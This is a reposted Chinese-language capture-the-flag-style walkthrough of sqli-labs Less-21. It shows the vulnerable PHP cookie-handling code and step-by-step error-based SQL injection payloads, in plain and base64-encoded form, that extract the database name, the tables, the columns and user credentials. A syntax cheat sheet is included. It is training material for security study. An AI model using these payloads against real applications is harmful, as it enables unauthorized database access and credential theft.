sqli-labs：Less-21關卡詳細解析

1. 思路🚀

本關的SQL語句為：

$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

注入類型：字符串型（單引號、括號包裹）、GET操作
提示：參數需以')閉合
關鍵參數：cookee

php輸出語句的部分代碼：

if(!isset($_POST['submit']))
{$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "<center>";echo "<br><br><br><b>";echo '<img src="../images/Less-21.jpg" />';echo "<br><br><b>";echo '<br><font color= "red" font size="4">';	echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "</font><br>";	echo '<font color= "cyan" font size="4">';	echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			echo "</font><br>";			echo '<font color= "#FFFF00" font size = 4 >';echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";echo '<font color= "orange" font size = 5 >';			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$cookee = base64_decode($cookee);echo "<br></font>";......
}

本關卡的關鍵回顯語句是echo "YOUR COOKIE : uname = $cookee...和$cookee = base64_decode($cookee);，需通過正確的賬號密碼后才會正確回顯信息，并且已知正確的賬號和密碼，暫且每次提交的賬號密碼都是admin，根據提示配合報錯盲注。

在這里插入圖片描述

2. 手工注入步驟🎯

2.1. 獲悉Cookie格式?

下圖是使用Burpsuite的Repeater抓取數據包得到的帶有Cookie的請求格式，需要注意的是會有2個請求，先是POST請求，再是GET請求，只有GET請求中才攜帶Cookie。

在這里插入圖片描述

因為代碼中進行了Base64解碼，所以我們必須先對其進行Base64編碼，這樣的加解密操作才能進行正常的sql語句。使用HackBar擴展，接下來的過程只需要將下面編碼后的Cookies放入對應位置，粘貼即可。
注：Cookies的開頭是uname=

2.2. 獲取基本信息?

1') and updatexml(1,concat(1,(select database())),3) #

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMSwoc2VsZWN0IGRhdGFiYXNlKCkpKSwzKSAj

在這里插入圖片描述

2.3. 獲取表名?

1') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),3) #

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JykpLDMpICM=

在這里插入圖片描述

2.4. 獲取字段?

1') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users')),3) #

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWEgPSAnc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lID0gJ3VzZXJzJykpLDMpICM=

在這里插入圖片描述

2.5. 獲取數據?

1') and updatexml(1,concat(1,(select concat(username, ':', password) from users limit 0,1)),3) #

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMSwoc2VsZWN0IGNvbmNhdCh1c2VybmFtZSwgJzonLCBwYXNzd29yZCkgZnJvbSB1c2VycyBsaW1pdCAwLDEpKSwzKSAj

在這里插入圖片描述

2.6. 參數匯總表?

參數	作用	示例
`')`	閉合符號	`id=1)'`
`#`	注釋符	`#'`
`updatexml()`	報錯注入函數	`updatexml(1,(select database()),3)`
`concat()`	字符串拼接函數	`concat('a','b')` 或 `concat(1,(select database()))`
`information_schema`	系統數據庫	`from information_schema.tables`
`table_schema`	數據庫名稱	`table_schema='security'`
`table_name`	數據表名稱	`table_name='users'`
`column_name`	字段名稱	`group_concat(column_name)`

3. Base64加解密工具🛠?

加菲在線工具：https://www.orcc.top/tools/base64
錘子在線工具：https://www.toolhelper.cn/EncodeDecode/Base64
白盒子在線工具：https://www.baihezi.com/base64

4. 總結🏁

HTTP Cookie（通常簡稱 Cookie）是 ??服務器發送到用戶瀏覽器并保存在本地的一小段數據??。瀏覽器會在后續的 HTTP 請求中自動攜帶該 Cookie，以便服務器識別用戶身份或存儲用戶偏好。

本關卡在http請求頭中的Cookie做文章，并且進行一次變種，為了達到sql注入的效果，需同時配合報錯盲注獲取數據。較為基礎的Cookie注入見文章"sqli-labs：Less-20關卡詳細解析"
https://blog.csdn.net/qq_62000508/article/details/149864853?spm=1011.2415.3001.5331
有關報錯盲注的解析，關卡5最為詳細，歡迎移步"sqli-labs：Less-5關卡詳細解析"
https://blog.csdn.net/qq_62000508/article/details/149778521?spm=1011.2124.3001.6209

聲明：本文僅用于安全學習，嚴禁非法測試！ ???

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/pingmian/91903.shtml
繁體地址，請注明出處：http://hk.pswp.cn/pingmian/91903.shtml
英文地址，請注明出處：http://en.pswp.cn/pingmian/91903.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！